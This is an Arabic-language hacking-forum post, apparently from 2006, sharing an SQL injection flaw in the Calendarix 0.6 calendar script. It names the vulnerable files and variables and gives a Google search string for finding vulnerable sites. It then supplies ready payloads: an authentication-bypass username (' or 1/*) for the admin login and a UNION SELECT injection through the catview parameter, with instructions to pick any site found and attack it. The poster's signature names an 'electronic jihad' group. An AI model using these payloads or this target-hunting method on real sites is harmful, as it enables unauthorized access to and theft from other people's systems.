Members Login
Username 
 
Password 
    Remember Me  
 
hacking collection -> هاكر اختراق المواقع -> ثغره جديده في التقوايم
Post Info TOPIC: ثغره جديده في التقوايم
so9or


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
ثغره جديده في التقوايم
Permalink   
 




السلام عليكم ورحمة الله وبركاته

جايب ثغره أنشاء تعجبكم وهي جديده


تاريخ الثغره 2006.01.26

نوعها من SQL Injection

خطورتها متوسطه

الملف المصاب Calendarix0.6

معلومات عن الثغره
Vulnerable scripts:
cal_functions.inc.php
admin/cal_login.php

Variables $catview(cal_functions.inc.php) $login(admin/cal_login.php) isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Authentication bypass is possible.

Condition for Authentication bypass: gpc_magic_quotes - off

طريقه الأستغلال

أبحث بجوجل عن


كود:Calendarix0.6.20050830


بنظهر مواقع كتير

طبعاً أختر موقع وبتخش على التقويم على طول

طبعاً أدا ما جات صفحة التقويم فالثغره غير موجوده وكمان لازم يكون gpc_magic_quotes - off


وتوجد طريقتين للأستغلال
1. Authentication Bypass

تضيف


كود:admin/cal_login.php


اليوزرنيم


كود:' or 1/*


والباسورد أي شيء

2. SQL-Injection

ضيف


كود:cal_day.php? op=day&date=2006-01-10&catview=99% 20union%20select% 2012345


 

 

http://www.google.com.sa/search?hl=ar&safe=active&q=++Calendarix+0.6.20050830&btnG=%D8%A7%D8%A8%D8%AD%D8%AB&meta=طبعا لا حظ التاريخ ورقم الضويه غيرهم


__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.
hacking collection -> هاكر اختراق المواقع -> ثغره جديده في التقوايم
Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse 		Powered by ActiveBoard